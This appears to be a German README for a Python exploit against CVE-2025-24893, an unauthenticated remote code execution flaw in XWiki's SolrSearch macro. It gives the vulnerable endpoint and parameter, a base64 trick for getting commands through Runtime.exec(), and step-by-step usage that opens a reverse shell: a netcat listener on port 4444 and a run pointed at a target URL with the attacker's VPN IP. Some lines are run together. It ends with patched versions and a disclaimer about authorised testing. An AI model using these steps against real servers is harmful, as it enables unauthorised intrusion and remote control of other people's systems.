
Exploit zur Remote-Code-Ausführung (RCE) in XWiki
Exploit zur Remote-Codeausführung (RCE) in XWiki
Ein Python3-Exploit für CVE-2025-24893, eine kritische Schwachstelle zur nicht authentifizierten Remote-Codeausführung (RCE) in der XWiki-Plattform.
Dieses Skript nutzt einen Code-/Ausdrucksinjektionsfehler (CWE-95) innerhalb der Makrokomponente SolrSearch aus. Der Fehler ermöglicht es Angreifern, beliebigen Groovy/Java-Code auf dem zugrunde liegenden Betriebssystem auszuführen. Der Exploit führt automatisch eine Base64-Kodierung durch, um die Einschränkungen der Befehlsinterpretation der Java-Funktion Runtime.getRuntime().exec() zu umgehen.
/bin/get/Main/SolrSearch (über den Parameter text)nc -lvnp 4444
python3 CVE-2025-24-893.py <ZIEL_URL> <IHRE_VPN_IP> <IHR_PORT>
Beispiel:
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
requestsUm die erforderliche Abhängigkeit zu installieren:
pip install requests
Aktualisieren Sie Ihre XWiki-Instanz auf eine der offiziell behobenen Versionen: 15.10.11, 16.4.1, 16.5.0-rc-1 (oder höher).
Dieses Skript wurde ausschließlich für Bildungszwecke, autorisierte Sicherheitsaudits und Penetrationstests entwickelt. Der Autor übernimmt keine Haftung für Missbrauch, Schäden oder illegale Aktivitäten, die durch dieses Werkzeug verursacht werden. Die Verwendung dieses Skripts gegen Ziele ohne vorherige Genehmigung ist strengstens illegal.